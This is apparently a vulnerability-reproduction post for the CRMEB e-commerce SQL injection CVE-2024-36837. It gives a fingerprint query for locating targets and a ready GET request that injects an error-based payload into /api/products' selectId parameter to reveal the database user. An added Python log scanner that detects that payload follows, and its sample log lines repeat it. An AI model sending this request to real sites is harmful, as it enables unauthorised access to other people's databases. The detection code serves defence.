0x02
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Query the current user
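For detection, the request above can be found in web server access logs by checking the selectId parameter of /api/products after URL decoding. The following is an added example, not part of the original post or of CRMEB: the combined log format, the constructed sample lines, the function names inspect and scan, and the rule that a legitimate selectId is empty or a plain number are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (assumed combined log format), not captured traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jun/2024:10:00:01 +0000] "GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=12 HTTP/1.1" 200 5120
203.0.113.10 - - [01/Jun/2024:10:00:02 +0000] "GET /api/products?limit=20&selectId= HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jun/2024:10:00:05 +0000] "GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1" 200 312
198.51.100.7 - - [01/Jun/2024:10:00:06 +0000] "GET /api/products?selectId=GTID_SUBSET%28CONCAT%280x7e%2C%28SELECT+%28ELT%283550%3D3550%2Cuser%28%29%29%29%29%2C0x7e%29%2C3550%29 HTTP/1.1" 200 312
203.0.113.11 - - [01/Jun/2024:10:00:09 +0000] "GET /api/products?selectId=abc HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
CALL_RE = re.compile(r"[A-Za-z_]\w*\s*\(")  # looks like a SQL function call


def inspect(line):
    """Return (client, reason, decoded_value) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if url.path.rstrip("/") != "/api/products":
        return None
    # parse_qs percent-decodes values, so encoded and raw payloads compare equal.
    for value in parse_qs(url.query, keep_blank_values=True).get("selectId", []):
        value = value.strip()
        # Assumption: a legitimate selectId is empty or a plain decimal id.
        if value == "" or re.fullmatch(r"[0-9]+", value):
            continue
        reason = "sql-expression" if CALL_RE.search(value) else "non-numeric"
        return client, reason, value
    return None


def scan(log_text):
    """Inspect every log line and return the list of suspicious hits."""
    return [hit for hit in map(inspect, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
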
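Originally published on the WeChat official account (冷漠安全): "Vulnerability Reproduction" CRMEB open-source e-commerce system /api/products SQL injection vulnerability (CVE-2024-36837)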